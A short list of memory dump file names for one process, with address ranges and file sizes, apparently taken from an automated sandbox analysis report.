memory/4616-13-0x000001FEA9E70000-0x000001FEA9EB4000-memory.dmpFilesize
272KB
-
memory/4616-12-0x00007FFF7C960000-0x00007FFF7D421000-memory.dmpFilesize
10.8MB
-
memory/4616-11-0x00007FFF7C960000-0x00007FFF7D421000-memory.dmpFilesize
10.8MB
-
memory/4616-15-0x000001FE916C0000-0x000001FE916C8000-memory.dmpFilesize
32KB
-
memory/4616-52-0x00007FFF7C960000-0x00007FFF7D421000-memory.dmpFilesize
10.8MB
-
memory/4616-16-0x000001FEA9830000-0x000001FEA987A000-memory.dmpFilesize
296KB
-
memory/4616-10-0x000001FE91690000-0x000001FE916B2000-memory.dmpFilesize
136KB